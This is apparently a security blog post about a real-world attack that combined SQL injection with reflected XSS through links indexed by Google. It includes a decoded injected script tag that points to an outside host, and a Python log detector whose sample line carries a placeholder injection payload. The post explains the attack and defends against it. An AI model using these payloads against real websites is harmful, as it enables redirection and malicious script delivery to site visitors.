More and more of today's web application attacks leverage multiple weaknesses, vulnerabilities or attack techniques in order to achieve the desired exploitation outcome. It is becoming increasingly difficult to neatly place an attack into one specific container (such as XSS, SQL Injection, etc.), since a single attack now often combines many issues.
One great example of this that I recently ran into was an attack scenario posted to the SANS Advisory Board mail-list. The user had set up some Google Alerts to monitor his public-facing web site. He didn't specify the details, however it is assumed that he was attempting to monitor for traditional Google Hacking information-leakage types of problems. In this particular case, the user received a Google Alert email with an odd-looking link pointing to a resource on one of his sites. The link looked as follows -
<a style="color: blue" href="http://munge.munge.edu/new_skills/workshop/info.php?
At first glance, it is easy to see that if the user clicks on this link, it would send an SQL Injection attack (due to the union and select keywords and formatting) aimed at the "wid" parameter of the "info.php" web page. What isn't so apparent is the data that is being extracted from the database. The union/select command combination is normally used by attackers to extract data from a DB; however, this SQL query is not specifying any particular tables or columns. The user described that if the link is actually clicked on (which was a bad idea, as it actually launched the attack), then the user would be redirected to some porn sites.
So what is happening here?
The data within the SQL Injection query payload is actually hex encoded. If you decode this data, you will see the following -
<script src="http://traf.in/c.php"></script>,Porntrailers,0,0,Amateur sex videos/
The ultimate goal with this attack is to force users to visit these porn sites. The methodology used is -
- Attacker identifies a website that has an SQL Injection vulnerability.
- They then place web links that contain the SQL Injection payload targeting the vulnerable site on other web sites.
- Googlebot then crawls the attacker's sites and indexes the attack weblink.
- Anyone running Google searches, or in this case anyone who has a matching Google Alert set up, will receive this malicious link.
- If they click on the link, they will launch an SQL Injection attack against the website.
- The user will then be redirected to a porn site.
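The detection side of the scenario above, as an added example that is not part of the original post: a small log-inspection routine that URL-decodes each request, looks for the union/select combination, and decodes any 0x... hex literals so that markup hidden inside the SQL payload becomes visible to the analyst. The log lines, host and script URL are constructed placeholders, not the data from the mail-list report.

```python
"""Flag union/select requests whose hex literals decode to HTML or script markup."""
import re
from urllib.parse import unquote_plus

# MySQL-style hex string literals (0x...), the encoding the payload on this page used.
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]{2,})")
# Loose SQLi signature: UNION followed, after anything, by SELECT (case-insensitive).
UNION_SELECT = re.compile(r"\bunion\b.*?\bselect\b", re.IGNORECASE | re.DOTALL)
# Markup that has no business inside a decoded SQL string literal.
MARKUP = re.compile(r"<\s*(script|iframe|img|object|embed)\b", re.IGNORECASE)
# Pulls the request target out of a common-log-format request line.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD)\s+(\S+)\s+HTTP/')


def decode_hex_literals(text: str) -> list:
    """Return the decoded form of every 0x... literal found in text."""
    decoded = []
    for m in HEX_LITERAL.finditer(text):
        h = m.group(1)
        if len(h) % 2:  # odd number of hex digits cannot be a byte string
            continue
        decoded.append(bytes.fromhex(h).decode("utf-8", errors="replace"))
    return decoded


def classify_request(log_line: str) -> dict:
    """Classify one access-log line; also returns the decoded literals for review."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return {"sqli": False, "hidden_markup": False, "decoded": []}
    # Decode twice: links relayed through crawlers and mail are often double-encoded.
    target = unquote_plus(unquote_plus(m.group(1)))
    decoded = decode_hex_literals(target)
    sqli = UNION_SELECT.search(target) is not None
    hidden = any(MARKUP.search(d) for d in decoded)
    return {"sqli": sqli, "hidden_markup": hidden, "decoded": decoded}


# Constructed sample log lines (hypothetical host and paths). The injected literal
# is built from a placeholder script tag so the hex is exact and obviously fake.
_TAG = '<script src="http://example.invalid/c.js"></script>'
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2009:00:00:01 +0000] "GET /info.php?wid=42 HTTP/1.1" 200 512',
    '198.51.100.9 - - [01/Jan/2009:00:00:02 +0000] "GET /info.php?wid=42%20union%20select%200x'
    + _TAG.encode().hex() + ',0,0 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify_request(line))
```

Only the second sample line is reported as both an SQL Injection attempt and a carrier of hidden markup; a benign request to the same page is left alone.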
The concept of using SQL Injection as an XSS delivery mechanism to distribute malicious code started with the Mass SQL Injection Bots (Stored XSS, as opposed to the Reflected XSS in this case) and appears to be continuing as the bad guys figure out more and more ways to monetize it.